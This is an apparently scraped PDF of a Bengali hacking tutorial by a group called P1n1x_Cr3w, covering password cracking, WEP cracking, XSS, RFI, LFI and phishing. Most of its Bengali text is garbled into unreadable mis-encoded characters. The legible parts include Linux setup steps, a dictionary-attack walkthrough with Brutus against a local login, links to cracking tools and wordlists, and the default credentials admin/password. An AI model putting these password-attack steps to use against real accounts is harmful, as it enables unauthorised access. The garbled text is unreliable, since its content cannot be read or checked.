fussilatbd educational website · 2020. 3. 23. · fussilatbd educational website
TRANSCRIPT
![Page 1: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/1.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
1
![Page 2: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/2.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
2
��� ������� ������� ������� ����
���� ��� ����� ���� �����।���� ��� ���� �� ���� ��� ��� ��� ��।����
� ��� !"����� ��#�� ������� ���$% �"� ���� ����&�� ��� ���'।(���)��� '��* +,�- ��� ���'।�����* ������ +��� ��'� ��.�� �� ����� ����"�
+/���� +�) www.facebook.com/p1n1x.cr3w +� ����� ���� +��� ���� ����&��
����� ��� ����� ����AB ��C���* +��� ���� ��* ��D���� $��� ����&�� �����।
����� $�E�� ���� ���� ���� (�� ��।/�� ���� ��� � ��F��AB�"� ��' +���� ����
&�� ���"� �G� �� ��.�� ����#� �H ,��� ���� ������ ��* ��IJ���� ���� ����।
�� ���� ���� +��� (K, �$�,�-,�����A ����� ����"� +/���� +��) )������� )�
�����# ���'। �� �BM� ��* #�� ��� ������� +��N ���� ���� ����� O�
��C�P +�� �����।�� ���� ������ ���� F.A.Q(Frequently asked questions)
+,�- ���� &��H।�����"� ����� '�^� +�� ��� ��।
--P1n1X
![Page 3: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/3.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
3
Gr33Tz:Gr33Tz:Gr33Tz:Gr33Tz:
������"��� ���
������ ����
(Evil$oul,b3du33n,C.D.H,rex0,Pp,Thunder,K.bal0k,Xen0n,w4nt3d and My friend 3xp1r3)
*��� ����!���� +q����r
���
��-+��) *������� +N�$�����"� (��
![Page 4: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/4.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
4
�s�&���s�&���s�&���s�&��
t� #���$s����-
t.���� +�?
O.������ +v�B��$�-।
w.��$��� ���� *�� ,��?
O� #����(�x����-
t.(���)�B���।
O.+����� +��� �� ��� !�&� ?
w.+� �� ���A�y� !���।
w� #�������z-
t.��� ��?
O.�����z� �N�{��!�� ��s
w.����z &������
|.����z +� �
|�A #������*��NA
t.���*��NA }����
O.�/���
![Page 5: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/5.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
5
~� #������*���A ����- t./� ��(���
O.+���A ������
w.����� x����
|.Vulnerability ���&A�
~.+��������
�� #���*������ ���� t.*������ +��*���A ������
O.WEP }����
w.����� ���/�
�� #���!����) ���� t.NETBIOS
O.!����) ���*��NA }����
�� #������*���-
t.����
O.+(�� ��
�� #���*��� ����-
t.}� ���� �����(XSS)
O.������ /��� ������(RFI)
w.+����� /��� ������(LFI)
![Page 6: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/6.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
6
tttt���� #�� #�� #�� #��
$s����
���� +� ?
���� �H� +�� ��� �,�� �����y�/ �����y�� ���� )�^� ��� �����y� ����� ��A� �"� ���) +�� ���� ����E$��� "F ��� � ���!��� ����� ��# ��(��� ����� �F� �� �� ����A -$B� ����� �#���B । ��#���$��� ���� ���� �����-�� �� ���� ��A� ���&�� +��� ���� � ,��� �s�� ����s�� �� ���#�s�� ��A��� ��� ����। �'�^� ���� ����� ���� ����' (,��� ��#���$��� ��"� �� �� ���� ���� ����&�) ��� ������� ����A ������ ���� ��' ,��"� #��� �� �� ���� ��� । ��"� ��# ���A� ���� )� (��� }���� ���� ���� ��� �, ,� ���!��� �����y� ���� +��� ����N��� ��E��� ���� +��� ���"� ���� )� ���� ��� � ��� ��#� ���� (����� �� �� ����) +��� ����� ������ (��"� �� �� ����) ���A� ��.��� ���� �।
O.������ +vPB��$�-
��"���"���"���"� �� ���� ���� ���� �� ����������������-��� ���!��� ��� ������ *����A� �����y� ("�� ���।��� � �* ���� F�� ��#� ��� ��।��"��� ������ ����* ��� �� ����।
#s��#s��#s��#s�� �� ���� ���� ���� �� ����������������- ��� ��� ��#���� ���� ,��� ��"� �� �� * ����� �� ���"� �#��AB ���� ���� ���।��� ��H ���� ���* F�� ��#�* ���� ���� ���� !����* ���� ����।
�������������������� �� ���� ���� ���� �� ���������������� ---- ���� ���� ��#���� ����� �� �� �����"�� ��.��।��� ������ +��� �� +��� $��� ���� F�� ��#� ���।������ *����A ��� ������ �I��� �� ����।
![Page 7: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/7.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
7
����������������-��� ��� "F ����।��� ����� }�� ��� �$��� ����� ���� ��� ���)�"���
��G�$��� �������* ���� ���� ।��� ��#��P� ���$% #���� �z���� ��) +�� ���� ����।+(�x���� ����* ��"� $�� #���� ����।
������N������N������N������N-��� ���)�� ���� �� ��� ������ ���� ��।���$% ���� �� ��� ������� ��� ���� ��� ��� ���,A����J ���।
��*/�����*/�����*/�����*/��� �������� ������������ ---- ��� ���� ��F��AB।��� ���� +��� �� �'। � ��A ��"� ���-��� �� ��!�� ��� ,��।
w.��$��� ���� *�� ,��?
���� ���� *�� ���� �) �� ��� �� ��^����^ *�� ,�� �� । ��)� ���� ����� ��� ����� ��� B� �� � ������� ����� +&�� ��* +��� ���#�� ���� �।�� ��� ��� �� �� �� ���� ��� ।�� ����#,A #��� ���� ��, �#,A �� ����� ���� *��� ��� +����� �� । ��
![Page 8: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/8.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
8
OOOO� � � � #�� #�� #�� #��
+(�x����
t.(���)�B���
�� �� ���)�� �)���� ���� �����, +(�x���� +� � �� �� (���)�? !y� ��� ���� ��
��� ��।��� ��sPA ��$A� ���� +����� �H�� !��। +(�x���� $���� $��� )��� �� ����� ��G� $��� ���� ��� ,��� ��।,�" �� �� +(�x���� �� +���.�, ���� ���� +������ ��� ���N ����� +vPB$�� ����।+(�x���� )���� ��'� ����#� ��
t.+������ ��)� �$)�� ���� ����� ����&�� ��� ��।
O.�� ��#�� ����� �� �� ������ �� ��) vulnerability ���) ��� ���।
w.���)� ���� +(�x�� �"�� ���� �� ���� �� �� ���)� ��� ��।
O.+����� +��� �� ��� !�&�?
��� +��� ��J� +�� +, ���� +(�x���� $�E� +� � �� ����,��¡ )��� �� +���� +��� �� ���� ।���� ��� http://www.w3schools.com +��� �� �� HTML +� � �� ���� �����।�� �� � £��� ।
w.+� �� ���A�y� !���
��$��� +(�x���� +� � ,���,� (�K� !y� ��� �"�H ...
t.���!��� ���� ��)��� ,� ����� �� ��' ��x� ��� �।
O. !����) �����- ����, ����z xP ����।�����"� )� �����z� +&�� $�� +��� ������� ����� ���।���� ��^�� ����#� � �� �� &����� ��� ���)� �� ��� ��¤���
![Page 9: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/9.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
9
����� ।���P �� +���A +��N ��sPA !¥s�।
w.���� #B�� #B�� ������ +(�x���� ���£��) ��� +/���।���� ���&�� £�¦�s�A।+(�x���� ���£��) �� !�� +����� "F�� ,� +��� ��। �� �� �� $�� ���� �� �����,+��� ��§ +�� ।+����� �� ��? ��&.��.��.��>)�$����>��>��++>���A>�����>.........>�� ,��� +�E ���� �� ।
|. ���B�� ! ���B�� ! ���B�� !��� ��� ���B�� +����� ।
![Page 10: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/10.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
10
wwww� � � � #�� #�� #�� #��
����z
t.��� �� ?
����z ���!��� ,�«� )�� ���� ���� ���&��� ���� ( ������� �����)।����z ������� ������� ����A� �� �s� ����* ����z ��� �।
����z�� *��� +���A * �����s� �/�*��� #���� ���� �"�A !"��P ����� ����&�� ��� �। ��� ¬-����F� ������� ����� +,�� !����) ��� ��� *�� �� ����z ���$%$��� ���"�।�����z� ��A�� +���A +��N +, +�! ��#�B�$��� ���� ���� �����, �� !%����#� ���� �����, ����� �����A��P* ���� �����।
�� ��G�$��� ����z ���� �#� ����z ����A���� +��.��।��� +,-�� �!��z-�"I� ������� ����� ����z ����A��� !�� �$�y ��� ��� �s�� +��� (* ���) (��®� ����¯�� * ���� *� ����A��� ���� ,�� ��� ������� ���', ��#��P$��� +�-�� ������� ������� ����z ����� �PA�� ��� �।
��* ���� ��A ���� ����z �N�{��!�� ���� ����z ������� ����� * �� ���� ������I � ����� ������P� ������� �/�*���-�� ���r�� +��.��।����z �N�{��!�� £��� ��)� ���!���� �°�� * ���N� ��� ,��।
��'� +NC�� ������ +,�� +��� ��� +��N� ��#��P� +��� �����z� ���� )�^� ��� #��P� ��� ��* �£��� ��� ������� ������* (+,�� �±�����N-+�) ���� �।
![Page 11: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/11.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
11
(�����$��� +��� ��'� !²��B ���� �s�� ����z ���� * �� !%����#� �����।� � �^ �^ ���A����� +,�� ������, ��� ����}�������, �!���-����NA, ��$�, ����" ��$A��� ������ )�� ����z�� +��' �����'।+NC�� ��)���* �����z� &��"� * )��(��� ��^�'।����z ����E� * ����z ���A��"� ��� �����z� �� !³���� +�'�� ���P ����z �D�, �����", ��$A��,�- ��� ��� +����� ���"Ar ���}��� ��' +��� ����� � ��, �A�² ��� ���}��- #B� ��।
����z (�����$��� ���� w�� ����}�(����-�� )� ���� ��� ��* � � ��� ��A����� �� )��(� (����� ��� ������ * ����) ���!��� ���A���&��-�� #B�� ��) ���।x��� ���� (����NN �����), +,�� +������ +/��, ���-� �$�N* +��NA��, ����" +��� �� ��� ���-� +NC�� �� ����� ���!���, ����� ����� ���!��� - �� �������� � � ����z ���� � ।
O.�����z� �N�{��!�� ��s
*��� +���A �� ��# ��� £��� ������� ����� ����' । ,� ��£��� ����z �� !�� ��$A� ��� ���� ।http://distrowatch.com +��� �� ������ +"� ��* ।
w.����z &������
����z &������� ��� £��� �J�� ����' । ��� ��� �# +��� ������ ���� ����&�� ���।
���$ ���N
+, ��� CD/DVD +��� BOOT ��� '�^� ������� ����� &��� ��� ,�� ���� ���$ ���N ��� � । �� ��#�� �� ��) ����z &������ ,��।���& ����z( !���� ) �� ���$ ���N ���� ���� ���� +"*�� ���।
![Page 12: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/12.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
12
t.http://www.ubuntu.com/download/ubuntu/download �� .ISO /��� wO ��� �| ��� N�!����N ��� ��*।
2. N�!����N +�E *��� �� /��� �� º��� ���N�� ���A ��� ��* ।
Wubi Wubi Wubi Wubi
Wubi ���� ��� �(� ��� ।Wubi�� ��#�� !����) +��� ������ !���� �°�� ��� ,�� ।Wubi �� ��#�� !���� �°�� ���� ����:
t. ���A +��E ���N +��� Autoplay ��� wubi.exe *��� ���� ।
![Page 13: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/13.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
13
O.Install inside !����) ����� ����¼ ���� ।
w.����AB !������ �H��� ��� ����¼ ��� �°�� "�*।
![Page 14: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/14.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
14
|.�°�� ��sPA *��� )� ��F� +�����।
![Page 15: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/15.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
15
~. �°�� ��sPA �� Reboot ����� &�� "�*।
�. ���� !���� �°�� *�� �� ���� ��'�FP �� ��# �°�� +�E ��।
��.¾� �°�� ���� ��� +�� �� �� ��।���� *��� �°���� �� �°�� �� /�� ��� +��� ��-��।
![Page 16: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/16.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
16
Virtualbox($�&�A����z)
$�&�A����z ����z &������� ��� �J�� ।�� ����, MAC ��� !����) +��� +,���� ����z &���� ,�� ।
t.(��� http://www.virtualbox.org/wiki/downloads +��� $�&�A����z N�!����N ��� ��*। O.�°�� ���� । w.Virtualbox &��� ��� !���� New ����� &�� "�*।
![Page 17: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/17.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
17
|.Next ����� &�� "�*।
![Page 18: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/18.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
18
~.��� +�� � ��� ��� +��� !���� +��' ��*।
![Page 19: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/19.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
19
�. ����z &������� )� RAM �� +����� ������ ��#A��P ���� ।�s� RAM �� t/O ��� t/| �� +������ �"�� $���� �।���� O �)�� RAM ����',��� ~tO �����' ।
![Page 20: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/20.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
20
�.Next ����� &�� "�*।
![Page 21: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/21.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
21
�. � � +������ Dynamic ��� Fixed ��� �'§ ���� ��। ,�" HDD +� �,A�Á �����P )��-� ���� ���� Dynamic image ���, ,�" )��-� �� ���� ���� Fixed Size image ���� ���� ��।
![Page 22: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/22.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
22
�. ����z �� )� )��-�� ������ ��#A��P ��� ��*।
![Page 23: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/23.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
23
tÂ. G�Ã� ����� Finish � &�� "�*।
![Page 24: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/24.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
24
tt. ��� ���)� +���� .ISO /����� ��) ���� � � Next ���� � &�� "�*।
tO.��) (�� +�E !!!
![Page 25: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/25.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
25
tw. � � �� �� ������ �s��A� ���� �/�� ����।� �� +��� CD/DVD Rom � &�� "�*।
![Page 26: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/26.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
26
t|.Mount CD/DVD ��� �"�� .ISO /��� ¯�!) ��� "�*।
![Page 27: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/27.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
27
t~. /����� ¯�!) ���� �� Select � &�� "�*।
![Page 28: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/28.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
28
t�.� � �� �� *� !������ ������ �/�� ����,� �� +��� Start � &�� "�* ।
![Page 29: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/29.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
29
t�. � � !���� ��� +��� ����। ���� Try Ubuntu +��� ���$% ��� �� ��#�� !���� �°�� ����।
![Page 30: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/30.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
30
����z +� �
� � !���� +"� �� �� $���� ����� +, ����AB�� �� ���� ��।������ +� � � � �� ��� !�&�।�� �� +" �� ���� +, (�� (�� �N�����!�� � ���� ����� ������� ����' ,� +������ ���, ����,��� ��� ���� £-� �������� ��#��� �� ����!��� �� �^�� )� �����A �"�।���& ��� ��'� �� �� �� �� ������ �"���' ,� +����� ���) ��-��।
http://www.mediafire.com/?tnmnh1viyi2
http://www.mediafire.com/?ru90ink6val
http://www.mediafire.com/?9fm2wbw2c28aeed
��� *������� ��' ,� ��sPA ����z ����A।���& ��'� $�� *������� �� ��� +"�� ��
• http://www.linux.com/
• http://beginlinux.org/
• http://www.linux-tutorial.info/
![Page 31: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/31.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
31
,��� '�� �� �$�N* +"� �� �� &�* ���"� )� ��'� �$�N*�
• http://www.vtc.com/products/Ubuntu-Linux-tutorials.htm
• http://www.vtc.com/products/Ubuntu-Linux-tutorials.htm
!���� �������� ����z �� �$���� ��� ������ �� ��E� )���� )� �,A�Á।���� +,���� ���� �� ��� *������� �� �$�N* +��' ��* ��� +� � �� ����।
![Page 32: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/32.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
32
||||�A �A �A �A #�� #�� #�� #��
���*��NA
��A���� ,���*��NA � *������� * ���!����� (#���� �����y� �����।���!��� �� +��*���A �����"� ��(��� �� )� ��� � �� +&�� �) !���।
���*��NA }����
+(�x���� ��#�� ���*��NA +}��� �� �s��A, ��� +��� ��)� �� ���*��NA }�� ���� )� ������ !��� �� � ���।
#+������� ��É������� – +������� ��É������� � , � �� )� ���� , � �����E� ��' +��� ��� ��Ë�� �� ��#�� �� +��। !"���P� )�, ,�" ���� ����� ���!��� �� ���*��NA +��� +&r� ���, +� ��� ���' ���)�� IT �N���A���� �� ��AB ����� ���&� �"�� ����।���"� �������� � ��� �� ���� :
��.N�����"���� ��.N���।���� ��� N���� ��� ��� IT �N���A���� +��� ���'।���� ��A���� +����� ���!��� � ���� ��� � �����y� ����-�" ���� +&r� ���'।��¡ ���� +����� �!)�� +N�����) ���,�- ���� ����' �� ��� �� ��x ���� ����' ��।�� �� �� ����� +����� ���!��� �� ���*��NA )����� ���, ����?"��.N��� ¬$���� ��.N���� �� )� �� ��$� ���� ��� ���� ���*��NA ��� �"��।�� �� �� +-�।���� � � ��� ���!� � ,� ��� ���� ����।
#Shoulder surfing- Shoulder surfing ,��,�$��� �� ��A� ���।���� ��)� +����� ����#� !�� �"�� ���*��NA +" �� +&r� ��� ।
#Guessing - ,�" �� �� ���� ��A� ���*��NA ���� ��� ��� ���� ���� +����� ���� �� ���� -��EP� ���� ��#�� ��) ����� ��� ���*��NA }�� ����
![Page 33: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/33.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
33
����।�� ��'� !"��P��/�� �����,+��E� (���,)¥�"� �� +����� -��A�±�/���±� �� ���, )¥�"�,+/������� ����"।
� � ���� �) low-tech ���*��NA }���� �� +�Í�� ����A )�����, ���� ��'� high-tech +�Í�� �z���� ���।��� ��'� +(�x�� ���� ��� ,� �� �� ���� ���� +-�� +����� ���$����� ��#� �"�� ����। +������ +����� ��� $����� �� ���� �� , � +(�x�� £��� N�!����N ���� * &��� ����।
#Dictionary attack – ���*��NA ,�" �) ��'� �� ���� ���� �� $��� �� }�� ��� ��� �।�N������ ������ ��� �� £H �sPA��#A���� �� ���� ���� ��-��� ��� ���� ��� �।!"����� +" ��� ������ $��� ��.�� �����।��G� ���*��NA }������� +F�� �� �J�� ��) �����। ��Î��� � !"���P, ��� ���� �/���� ��$A��� �N������ ���� +" ��� Brutus ���� ���,��� ���� �� ��#��P ���*��NA +}���। Brutus ���� !����) +(�x��।!"���� +"��� ��- +������ )���� �� �/���� ���$�� ��।�/���� � /��� ��°/�� +(������।�/���� � ������� � /��� �z�&É �� ��� ���� !���।,�" +��� ���� �/���� �"�� +��� *������� � ����� ���� ���� +� +, +��� ��'� �����N �� �N��� ���� �����। �/���� �G���� ��� *������� �G����� ��� �#���� http:// �� ������A ftp:// ����।
t.(��� ���� ���� �F +��' ����।#�� ��� ���� ����� ����!��� ��� �� ip ��Ï� � 127.0.0.1 ।
O.�/������ ,�*��� �� �/����://127.0.0.1 ��� ���� �!)����� ��� ���*���NA� )� ���� pop-up ��z +" �� ���।
![Page 34: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/34.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
34
w.���� ���� ���� +(�x�� &��� ���� ,� ���*��NA }�� ���� )� ��� � ��� Brutus ���� ���।
��* ��'� ���*��NA }���� +(�x�� ��' +,�� ;
• http://www.oxid.it/cain.html
• John the Ripper http://www.openwall.com/john/
![Page 35: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/35.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
35
• THC Hydra http://freeworld.thc.org/thc-hydra/
• SolarWinds http://www.solarwinds.com/
• RainbowCrack http://www.antsight.com/zsl/rainbowcrack/
|.�F���� +����� ���� (��� ���* ��� ���� ����� �/���� +��' ��*।
~.�N/¤ +���A Ot ��¡ ��'� *������� ���"��� ���� +��� �����" ���� )� ���'��� �����A� ���।। ,�" �� �� +"� � +, �N/¤ +���A Ot ��, ���� �� �� +���A C���� ���� ��#�� ��� ��) +��� �����।� ������ �� ����� � ��� ����&�� ���।
�.�� �� ,�" �/���� ��$A�� �� �!)����� �� )���� ���� +������ �� +&�� ���� ��� � ��� �!)����� ������ +��� ��।
�.���� �N�������� ���� +����� )� ������N * �� ������ +��' ���� ��। ¯�!) ��� �� y����� $�� /��� �� +��' ���� ��।���� ��'� $�� ���*��NA +��� �����।
http://packetstormsecurity.org/Crackers/wordlists/ ���& ���*��NA �� �!)����� +��� �� ���� �� +"�� �।
![Page 36: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/36.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
36
�।+(�x�� �� &��� ���� ���� ���� ��� ��$A��� ���,�- ���� ��� ������ +��� ��D
��� ����� +&r� ���� �� ����।
�।,�" ���*��NA �) � ���� ��G� �!)����� * ���*��NA �� ����� +��� ,���।+,�� ���& +" �G� �!)����� * ���*��NA �� �����
�!)����� – admin
���*��NA – password
![Page 37: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/37.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
37
tÂ।Ô��A ���� ���� ���� +(�x�� ���� ���� ��� (�z ���� ����। (�z +����� ���!��� �� ���� ��N ��� � ���� ���!��� �� ��#�� ���� ��� +����� ���-A� � ���G��।��� ���� &���� #���� ���� �� �� ���&� '���� +"� ����। Brutus �F ��$A��� +����� !������ ���� ����� ��,A����PB ��G��।
![Page 38: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/38.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
38
tt। 127.0.0.1 � ���� �� ���� ��Ï�।�� �� �&Õ �� )� �� )� ���� #�� �� ��� ����� ��� .������ ���।
![Page 39: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/39.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
39
� +/��A ����
��� �� �����F Ö� +/��A ���� +, +��� ���*��NA }�� ���� ����। Ö��/��A ���� ���� �� ����� F� ����E &��� ���� ����� ��� ,�FP �� �,A ��G� ���*��NA �� ��*�� ,��।Ö� +/��A ���� ��� ��� +��।���& ��� +" ���� ��$��� Ö� +/��A ��� ��-� �/���� ��$A�� �� ����J ���� ��� ,��।
t।�N������ ���� �� �� � ���* �F ��� +���A (��� ����� �� ।��� +��N �� )� Ö�-+/��A +��' ���� �� ��� +��É ��� ���� ��।
O।+����� ,�" +��� #���� ���� +, ���*��NA �� �� ���� ���� �� �� ��G� ����� +��' ���� �������।!#���� �×� ��� ,�� �� �� ,�" )�� +��� ���� �� ���*��NA ����
![Page 40: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/40.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
40
���"Ar ����� ���. ����� ���� �� �� )���� ��A��Î ������ �"�� }���� (��� +'�� ��।
w।��� +'������ lowercase alpha +��' �����'��� +,��� ������ �Ø�B� F� ¾��।,�"* ��� �Ø�B� F� ¾�� ����� ����� ��� ��� ���-।
![Page 41: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/41.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
41
�/���
�/��� � q�A���� �� &��� ���� ���� (�}�� +,�� �!)�����, ���*��NA ����"।���* ���� ��Ë��������� ��#�� ���� �।
t।(��� ���� ���� �F �G� ���।�/��� �� )� �� +��� )��(� ����� ����$�£��� � Hotmail,Gmail,Yahoo।���� �£��� +����$�- ����E� ���� ���।�� ����� ,�" ���� ������ ����� ���� ���� �� �� +, �� *�������£��� ���� ���� ��� ���� ��* +��� ,���।� ��� ���� ���� �)���� +� �F ����� +��।
